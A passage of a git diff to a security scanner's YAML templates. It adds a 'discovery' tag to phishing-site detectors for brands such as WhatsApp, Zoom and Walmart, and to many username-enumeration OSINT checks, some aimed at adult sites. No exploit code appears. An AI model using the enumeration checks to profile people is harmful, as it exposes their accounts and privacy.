+ host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Visual Studio Code is a code editor redefined and optimized for building and debugging modern web and cloud applications. Visual Studio Code is free and available on your favorite platform - Linux, macOS, and Windows.' + - 'Visual Studio Code - Code Editing. Redefined' + condition: and + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"visualstudio.com")' # digest: 4a0a00473045022077df1013e5bb78203d44c4f2f3034f3296bab12d21865b5583a602708d60d2820221009950ff2a0d02fe8f842fb90d5921481e13a8ce51011e78c1c0c31040755791cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/vlc-player-phish.yaml b/http/osint/phishing/vlc-player-phish.yaml index c6677a14832..bac41a134de 100644 --- a/http/osint/phishing/vlc-player-phish.yaml +++ b/http/osint/phishing/vlc-player-phish.yaml @@ -1,5 +1,5 @@ -id: vlc-media-phish - +id: vlc-media-phish + info: name: vlc media phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://www.videolan.org metadata: max-request: 1 - tags: phishing,vlc-media,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'VLC: Official site - Free multimedia solutions for all OS! - VideoLAN' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,vlc-media,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'VLC: Official site - Free multimedia solutions for all OS! - VideoLAN' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"videolan.org")' # digest: 4a0a0047304502207ba0b5fffc647a3e9be6a085fd7a66158301e7806ea41836663b5e3cfc01ee7f022100e8fe8ad288957d9a28810fc8942ed341fdec8eabe7ba07e0170e3b1c2e69aa26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/vodafone-phish.yaml b/http/osint/phishing/vodafone-phish.yaml index 1069cbbccf8..1c56a6550e8 100644 --- a/http/osint/phishing/vodafone-phish.yaml +++ b/http/osint/phishing/vodafone-phish.yaml @@ -1,5 +1,5 @@ -id: vodafone-phish - +id: vodafone-phish + info: name: vodafone phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://vodafone.co.uk metadata: max-request: 1 - tags: phishing,vodafone,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Vodafone – Our Best Ever Network' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,vodafone,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Vodafone – Our Best Ever Network' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"vodafone.co.uk")' # digest: 490a0046304402202311906b87f9d51367093029df69d0776840c4942f6d6a401c9f93bae43aefa502201f83da80e85b633baff6019f8b99e0108fd0ad88283536cd47811ada8e507354:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/vultr-phish.yaml b/http/osint/phishing/vultr-phish.yaml index d536c1d36cc..971eae14372 100644 --- a/http/osint/phishing/vultr-phish.yaml +++ b/http/osint/phishing/vultr-phish.yaml @@ -1,5 +1,5 @@ -id: vultr-phish - +id: vultr-phish + info: name: vultr phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://my.vultr.com/ metadata: max-request: 1 - tags: phishing,vultr,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Log In to your Vultr Account - Vultr.com' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,vultr,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Log In to your Vultr Account - Vultr.com' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"vultr.com")' # digest: 4b0a00483046022100dd5c06e64aa866d45778dd68b51eeabe8528b4f5c5bab4d54a9f10aa6d8c385d0221008d80f0db5e58f9266e9c512d536313e9cf921b9e444e278d0185b941c8d77c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/walmart-phish.yaml b/http/osint/phishing/walmart-phish.yaml index 1caaef2f1f1..c4e45feb4a4 100644 --- a/http/osint/phishing/walmart-phish.yaml +++ b/http/osint/phishing/walmart-phish.yaml @@ -1,5 +1,5 @@ -id: walmart-phish - +id: walmart-phish + info: name: walmart phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://walmart.com metadata: max-request: 1 - tags: phishing,walmart,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Walmart | Save Money. Live better.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,walmart,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Walmart | Save Money. Live better.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"walmart.com")' # digest: 490a004630440220476ea6a623da334129a9a78b2935784980ae010e11cc50af9dd29626ede340c4022029d87d332945502603bc67ae5cdfdd22b9ab1e3c88008bc9197e567de8056c5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/wetransfer-phish.yaml b/http/osint/phishing/wetransfer-phish.yaml index 776300b2324..231ece00f8e 100644 --- a/http/osint/phishing/wetransfer-phish.yaml +++ b/http/osint/phishing/wetransfer-phish.yaml @@ -1,5 +1,5 @@ -id: wetransfer-phish - +id: wetransfer-phish + info: name: wetransfer phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://wetransfer.com metadata: max-request: 1 - tags: phishing,wetransfer,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'WeTransfer - Send Large Files & Share Photos Online' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,wetransfer,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'WeTransfer - Send Large Files & Share Photos Online' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"wetransfer.com")' # digest: 4a0a00473045022100987197dc1056dc42e8616405c07998e7a45bf278727733376b05d0182af492e5022071cf5dad8c297c3f9faa747c3fa62292e1f2bad4d1f9711fb014329a835b9303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/whatsapp-phish.yaml b/http/osint/phishing/whatsapp-phish.yaml index 95632661dc1..82a310ee79b 100644 --- a/http/osint/phishing/whatsapp-phish.yaml +++ b/http/osint/phishing/whatsapp-phish.yaml @@ -1,5 +1,5 @@ -id: Whatsapp-phish - +id: Whatsapp-phish + info: name: Whatsapp phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://whatsapp.com metadata: max-request: 1 - tags: phishing,whatsapp,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'WhatsApp | Secure and Reliable Free Private Messaging and Callings' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,whatsapp,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'WhatsApp | Secure and Reliable Free Private Messaging and Callings' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"whatsapp.com")' # digest: 4a0a00473045022100e2636d6340c66f4726ec4ffccdfe6755095244320b7a01718b6eec224098c03a022011213d6f1188c7c471ef4e62a9d47fd292456605e518e0f6d6007b2ae273ac3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/wikipedia-phish.yaml b/http/osint/phishing/wikipedia-phish.yaml index 9c48f3f763d..cd4b96fa6b2 100644 --- a/http/osint/phishing/wikipedia-phish.yaml +++ b/http/osint/phishing/wikipedia-phish.yaml @@ -1,5 +1,5 @@ -id: Wikipedia-phish - +id: Wikipedia-phish + info: name: Wikipedia phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://wikipedia.com metadata: max-request: 1 - tags: phishing,wikipedia,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Log in - Wikipedia' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,wikipedia,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Log in - Wikipedia' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"wikipedia.org")' # digest: 4a0a0047304502204170eee40c35b5e7ef7674d8683727abec3b659308f294b719b45aca1f0ecd95022100c4b185f488664056e69f18129b181b1809f99a591d0fb2d57e2084feb8cb820b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/winscp-phish.yaml b/http/osint/phishing/winscp-phish.yaml index aa62b71b75e..0cba4ab9e4a 100644 --- a/http/osint/phishing/winscp-phish.yaml +++ b/http/osint/phishing/winscp-phish.yaml @@ -1,5 +1,5 @@ -id: winscp-phish - +id: winscp-phish + info: name: winscp phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://winscp.net metadata: max-request: 1 - tags: phishing,winscp,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'WinSCP :: Official Site :: Free SFTP and FTP client for Windows' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,winscp,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'WinSCP :: Official Site :: Free SFTP and FTP client for Windows' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"winscp.net")' # digest: 4a0a004730450221009237ce07dcd96e299ff739966e69b8606396688ed537bd0230b0373543bc61a202202e971432cf1bbeb356908a7b09189a5dda03f19f78cc9ef70e82c824762169fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/yahoo-phish.yaml b/http/osint/phishing/yahoo-phish.yaml index c19dec4ea64..589f43a8ac9 100644 --- a/http/osint/phishing/yahoo-phish.yaml +++ b/http/osint/phishing/yahoo-phish.yaml @@ -1,5 +1,5 @@ -id: yahoo-phish - +id: yahoo-phish + info: name: Yahoo phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://yahoo.com metadata: max-request: 1 - tags: phishing,yahoo,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Best-in-class Yahoo Mail, breaking local, national and global news, finance, sport, music, films and more. You get more out of the web, you get more out of life.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,yahoo,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Best-in-class Yahoo Mail, breaking local, national and global news, finance, sport, music, films and more. You get more out of the web, you get more out of life.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"yahoo.com")' # digest: 4a0a00473045022100def9d730ff86aafabd8d52f024254d71158f2e33cc960278252b5dab0b07f01002206dfaebd5ae5e730c4438ff6897a8d3da5f8c72d5e1cbd5075dd56a3a6169de8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/zoom-phish.yaml b/http/osint/phishing/zoom-phish.yaml index d7140ebad0f..5eda7e007c1 100644 --- a/http/osint/phishing/zoom-phish.yaml +++ b/http/osint/phishing/zoom-phish.yaml @@ -1,5 +1,5 @@ -id: zoom-phish - +id: zoom-phish + info: name: zoom phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://zoom.us metadata: max-request: 1 - tags: phishing,zoom,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'One platform to connect | Zoom' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,zoom,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'One platform to connect | Zoom' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"zoom.us")' # digest: 4a0a0047304502200a52064a70e9d22b90661deb9a46203c12a6d88f056e22a3627d13493c982822022100d39e74d0d91ede0779f9dd24c5b3c20cf1b589ee9877f8bde0da27d2718fa635:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/user-enumeration/1001mem.yaml b/http/osint/user-enumeration/1001mem.yaml index b7897202137..4a4e92dc758 100644 --- a/http/osint/user-enumeration/1001mem.yaml +++ b/http/osint/user-enumeration/1001mem.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,1001mem + tags: osint,osint-social,1001mem,discovery self-contained: true diff --git a/http/osint/user-enumeration/21buttons.yaml b/http/osint/user-enumeration/21buttons.yaml index 58bdd5cc839..c355fba457a 100644 --- a/http/osint/user-enumeration/21buttons.yaml +++ b/http/osint/user-enumeration/21buttons.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,21buttons + tags: osint,osint-social,21buttons,discovery self-contained: true diff --git a/http/osint/user-enumeration/247sports.yaml b/http/osint/user-enumeration/247sports.yaml index dc0e0d6c45e..565d76e1d78 100644 --- a/http/osint/user-enumeration/247sports.yaml +++ b/http/osint/user-enumeration/247sports.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,247sports + tags: osint,osint-hobby,247sports,discovery self-contained: true diff --git a/http/osint/user-enumeration/3dnews.yaml b/http/osint/user-enumeration/3dnews.yaml index d3f7aee3faa..1d9ed22c97d 100644 --- a/http/osint/user-enumeration/3dnews.yaml +++ b/http/osint/user-enumeration/3dnews.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,3dnews + tags: osint,osint-social,3dnews,discovery self-contained: true diff --git a/http/osint/user-enumeration/3dtoday.yaml b/http/osint/user-enumeration/3dtoday.yaml index 8e81236ad28..cf33c032e9c 100644 --- a/http/osint/user-enumeration/3dtoday.yaml +++ b/http/osint/user-enumeration/3dtoday.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,3dtoday + tags: osint,osint-hobby,3dtoday,discovery self-contained: true diff --git a/http/osint/user-enumeration/7cup.yaml b/http/osint/user-enumeration/7cup.yaml index a12f0713865..3764c4c7c46 100644 --- a/http/osint/user-enumeration/7cup.yaml +++ b/http/osint/user-enumeration/7cup.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,7cup + tags: osint,osint-social,7cup,discovery self-contained: true diff --git a/http/osint/user-enumeration/7dach.yaml b/http/osint/user-enumeration/7dach.yaml index d57e62ce149..154fa7f5262 100644 --- a/http/osint/user-enumeration/7dach.yaml +++ b/http/osint/user-enumeration/7dach.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,7dach + tags: osint,osint-social,7dach,discovery self-contained: true diff --git a/http/osint/user-enumeration/9gag.yaml b/http/osint/user-enumeration/9gag.yaml index 2a158dc93b9..728b00f5f11 100644 --- a/http/osint/user-enumeration/9gag.yaml +++ b/http/osint/user-enumeration/9gag.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,9gag + tags: osint,osint-social,9gag,discovery self-contained: true diff --git a/http/osint/user-enumeration/aaha-chat.yaml b/http/osint/user-enumeration/aaha-chat.yaml index c492da2d00a..8d3c688f04b 100644 --- a/http/osint/user-enumeration/aaha-chat.yaml +++ b/http/osint/user-enumeration/aaha-chat.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,aaha-chat + tags: osint,osint-social,aaha-chat,discovery self-contained: true diff --git a/http/osint/user-enumeration/aboutme.yaml b/http/osint/user-enumeration/aboutme.yaml index dd2a3876ff2..e73c703c376 100644 --- a/http/osint/user-enumeration/aboutme.yaml +++ b/http/osint/user-enumeration/aboutme.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,aboutme + tags: osint,osint-social,aboutme,discovery self-contained: true diff --git a/http/osint/user-enumeration/acf.yaml b/http/osint/user-enumeration/acf.yaml index 893c3abeb30..e4eae6746f1 100644 --- a/http/osint/user-enumeration/acf.yaml +++ b/http/osint/user-enumeration/acf.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,acf + tags: osint,osint-coding,acf,discovery self-contained: true diff --git a/http/osint/user-enumeration/admire-me.yaml b/http/osint/user-enumeration/admire-me.yaml index 75d4f88f1f5..54e40f0d2de 100644 --- a/http/osint/user-enumeration/admire-me.yaml +++ b/http/osint/user-enumeration/admire-me.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,admire-me + tags: osint,osint-porn,admire-me,discovery self-contained: true diff --git a/http/osint/user-enumeration/adult-forum.yaml b/http/osint/user-enumeration/adult-forum.yaml index 3ba717dc3e1..484b8332b3f 100644 --- a/http/osint/user-enumeration/adult-forum.yaml +++ b/http/osint/user-enumeration/adult-forum.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,adult-forum + tags: osint,osint-porn,adult-forum,discovery self-contained: true diff --git a/http/osint/user-enumeration/adultism.yaml b/http/osint/user-enumeration/adultism.yaml index 6d9a7b649c1..ba526c15156 100644 --- a/http/osint/user-enumeration/adultism.yaml +++ b/http/osint/user-enumeration/adultism.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,adultism + tags: osint,osint-porn,adultism,discovery self-contained: true diff --git a/http/osint/user-enumeration/advfn.yaml b/http/osint/user-enumeration/advfn.yaml index d5b5d4d7919..57aea0bc666 100644 --- a/http/osint/user-enumeration/advfn.yaml +++ b/http/osint/user-enumeration/advfn.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,advfn + tags: osint,osint-finance,advfn,discovery self-contained: true diff --git a/http/osint/user-enumeration/aflam.yaml b/http/osint/user-enumeration/aflam.yaml index 94354565116..9a5aa9da12a 100644 --- a/http/osint/user-enumeration/aflam.yaml +++ b/http/osint/user-enumeration/aflam.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,aflam + tags: osint,osint-misc,aflam,discovery self-contained: true diff --git a/http/osint/user-enumeration/airline-pilot-life.yaml b/http/osint/user-enumeration/airline-pilot-life.yaml index 3c0cdcc5f64..ec83cc822ce 100644 --- a/http/osint/user-enumeration/airline-pilot-life.yaml +++ b/http/osint/user-enumeration/airline-pilot-life.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,airline-pilot-life + tags: osint,osint-social,airline-pilot-life,discovery self-contained: true diff --git a/http/osint/user-enumeration/airliners.yaml b/http/osint/user-enumeration/airliners.yaml index dbb1adb5f50..f879b3df6e8 100644 --- a/http/osint/user-enumeration/airliners.yaml +++ b/http/osint/user-enumeration/airliners.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,airliners + tags: osint,osint-social,airliners,discovery self-contained: true diff --git a/http/osint/user-enumeration/akniga.yaml b/http/osint/user-enumeration/akniga.yaml index 9220a5edef9..1e219d3d4e3 100644 --- a/http/osint/user-enumeration/akniga.yaml +++ b/http/osint/user-enumeration/akniga.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,akniga + tags: osint,osint-hobby,akniga,discovery self-contained: true diff --git a/http/osint/user-enumeration/albicla.yaml b/http/osint/user-enumeration/albicla.yaml index 8350346c95e..1d134e5d52e 100644 --- a/http/osint/user-enumeration/albicla.yaml +++ b/http/osint/user-enumeration/albicla.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,albicla + tags: osint,osint-social,albicla,discovery self-contained: true diff --git a/http/osint/user-enumeration/alik.yaml b/http/osint/user-enumeration/alik.yaml index ea2522bdce0..0c7786ac144 100644 --- a/http/osint/user-enumeration/alik.yaml +++ b/http/osint/user-enumeration/alik.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,alik + tags: osint,osint-social,alik,discovery self-contained: true diff --git a/http/osint/user-enumeration/allesovercrypto.yaml b/http/osint/user-enumeration/allesovercrypto.yaml index 94e4c27a749..20b8778ea2b 100644 --- a/http/osint/user-enumeration/allesovercrypto.yaml +++ b/http/osint/user-enumeration/allesovercrypto.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,allesovercrypto + tags: osint,osint-finance,allesovercrypto,discovery self-contained: true diff --git a/http/osint/user-enumeration/allmylinks.yaml b/http/osint/user-enumeration/allmylinks.yaml index 09abe6293c8..73674a8c346 100644 --- a/http/osint/user-enumeration/allmylinks.yaml +++ b/http/osint/user-enumeration/allmylinks.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,allmylinks + tags: osint,osint-social,allmylinks,discovery self-contained: true diff --git a/http/osint/user-enumeration/alloannonces.yaml b/http/osint/user-enumeration/alloannonces.yaml index e60eb50e33a..7487e0ca71e 100644 --- a/http/osint/user-enumeration/alloannonces.yaml +++ b/http/osint/user-enumeration/alloannonces.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,alloannonces + tags: osint,osint-social,alloannonces,discovery self-contained: true diff --git a/http/osint/user-enumeration/alltrails.yaml b/http/osint/user-enumeration/alltrails.yaml index 4ba9c5f645d..a75260fbade 100644 --- a/http/osint/user-enumeration/alltrails.yaml +++ b/http/osint/user-enumeration/alltrails.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,alltrails + tags: osint,osint-health,alltrails,discovery self-contained: true diff --git a/http/osint/user-enumeration/ameblo.yaml b/http/osint/user-enumeration/ameblo.yaml index b0d84b20c30..33930508472 100644 --- a/http/osint/user-enumeration/ameblo.yaml +++ b/http/osint/user-enumeration/ameblo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,ameblo + tags: osint,osint-blog,ameblo,discovery self-contained: true diff --git a/http/osint/user-enumeration/americanthinker.yaml b/http/osint/user-enumeration/americanthinker.yaml index e1087c20e4e..3a1201e7205 100644 --- a/http/osint/user-enumeration/americanthinker.yaml +++ b/http/osint/user-enumeration/americanthinker.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,americanthinker + tags: osint,osint-political,americanthinker,discovery self-contained: true diff --git a/http/osint/user-enumeration/animeplanet.yaml b/http/osint/user-enumeration/animeplanet.yaml index 316a9276f66..22461ffdc40 100644 --- a/http/osint/user-enumeration/animeplanet.yaml +++ b/http/osint/user-enumeration/animeplanet.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,animeplanet + tags: osint,osint-social,animeplanet,discovery self-contained: true diff --git a/http/osint/user-enumeration/anobii.yaml b/http/osint/user-enumeration/anobii.yaml index c0045979766..e8e26119a1d 100644 --- a/http/osint/user-enumeration/anobii.yaml +++ b/http/osint/user-enumeration/anobii.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,anobii + tags: osint,osint-hobby,anobii,discovery self-contained: true diff --git a/http/osint/user-enumeration/anonup.yaml b/http/osint/user-enumeration/anonup.yaml index 172cd1dd55f..baf7ffce6ef 100644 --- a/http/osint/user-enumeration/anonup.yaml +++ b/http/osint/user-enumeration/anonup.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,anonup + tags: osint,osint-social,anonup,discovery self-contained: true diff --git a/http/osint/user-enumeration/apex-legends.yaml b/http/osint/user-enumeration/apex-legends.yaml index e4daa59125a..3bec829ead8 100644 --- a/http/osint/user-enumeration/apex-legends.yaml +++ b/http/osint/user-enumeration/apex-legends.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,apex-legends + tags: osint,osint-gaming,apex-legends,discovery self-contained: true diff --git a/http/osint/user-enumeration/appian.yaml b/http/osint/user-enumeration/appian.yaml index 20f0c06f3bd..62d904f1ffa 100644 --- a/http/osint/user-enumeration/appian.yaml +++ b/http/osint/user-enumeration/appian.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,appian + tags: osint,osint-tech,appian,discovery self-contained: true diff --git a/http/osint/user-enumeration/apple-developer.yaml b/http/osint/user-enumeration/apple-developer.yaml index ba9ad305544..2491487eb84 100644 --- a/http/osint/user-enumeration/apple-developer.yaml +++ b/http/osint/user-enumeration/apple-developer.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-coding,apple + tags: osint,osint-coding,apple,discovery self-contained: true diff --git a/http/osint/user-enumeration/apple-discussions.yaml b/http/osint/user-enumeration/apple-discussions.yaml index f70a7cd8b68..606c369310a 100644 --- a/http/osint/user-enumeration/apple-discussions.yaml +++ b/http/osint/user-enumeration/apple-discussions.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,apple + tags: osint,osint-social,apple,discovery self-contained: true diff --git a/http/osint/user-enumeration/apteka.yaml b/http/osint/user-enumeration/apteka.yaml index 6e01a2fff22..7ff9f0f8c3d 100644 --- a/http/osint/user-enumeration/apteka.yaml +++ b/http/osint/user-enumeration/apteka.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,apteka + tags: osint,osint-social,apteka,discovery self-contained: true diff --git a/http/osint/user-enumeration/archive-of-our-own-account.yaml b/http/osint/user-enumeration/archive-of-our-own-account.yaml index 72c6bfaefee..23f823f20a9 100644 --- a/http/osint/user-enumeration/archive-of-our-own-account.yaml +++ b/http/osint/user-enumeration/archive-of-our-own-account.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,archive-of-our-own-account + tags: osint,osint-hobby,archive-of-our-own-account,discovery self-contained: true diff --git a/http/osint/user-enumeration/arduino.yaml b/http/osint/user-enumeration/arduino.yaml index 7f07b49e937..39d86b24813 100644 --- a/http/osint/user-enumeration/arduino.yaml +++ b/http/osint/user-enumeration/arduino.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,arduino + tags: osint,osint-tech,arduino,discovery self-contained: true diff --git a/http/osint/user-enumeration/armorgames.yaml b/http/osint/user-enumeration/armorgames.yaml index 43782537a08..4ed6b435e84 100644 --- a/http/osint/user-enumeration/armorgames.yaml +++ b/http/osint/user-enumeration/armorgames.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,armorgames + tags: osint,osint-gaming,armorgames,discovery self-contained: true diff --git a/http/osint/user-enumeration/artbreeder.yaml b/http/osint/user-enumeration/artbreeder.yaml index 2cdf336c9c4..5287c6574ab 100644 --- a/http/osint/user-enumeration/artbreeder.yaml +++ b/http/osint/user-enumeration/artbreeder.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,artbreeder + tags: osint,osint-art,artbreeder,discovery self-contained: true diff --git a/http/osint/user-enumeration/artists-clients.yaml b/http/osint/user-enumeration/artists-clients.yaml index 47b8f0d7fca..683ca8c2d37 100644 --- a/http/osint/user-enumeration/artists-clients.yaml +++ b/http/osint/user-enumeration/artists-clients.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,artists-clients + tags: osint,osint-art,artists-clients,discovery self-contained: true diff --git a/http/osint/user-enumeration/artstation.yaml b/http/osint/user-enumeration/artstation.yaml index d4a002bdc19..fe4a4c0f997 100644 --- a/http/osint/user-enumeration/artstation.yaml +++ b/http/osint/user-enumeration/artstation.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,artstation + tags: osint,osint-art,artstation,discovery self-contained: true diff --git 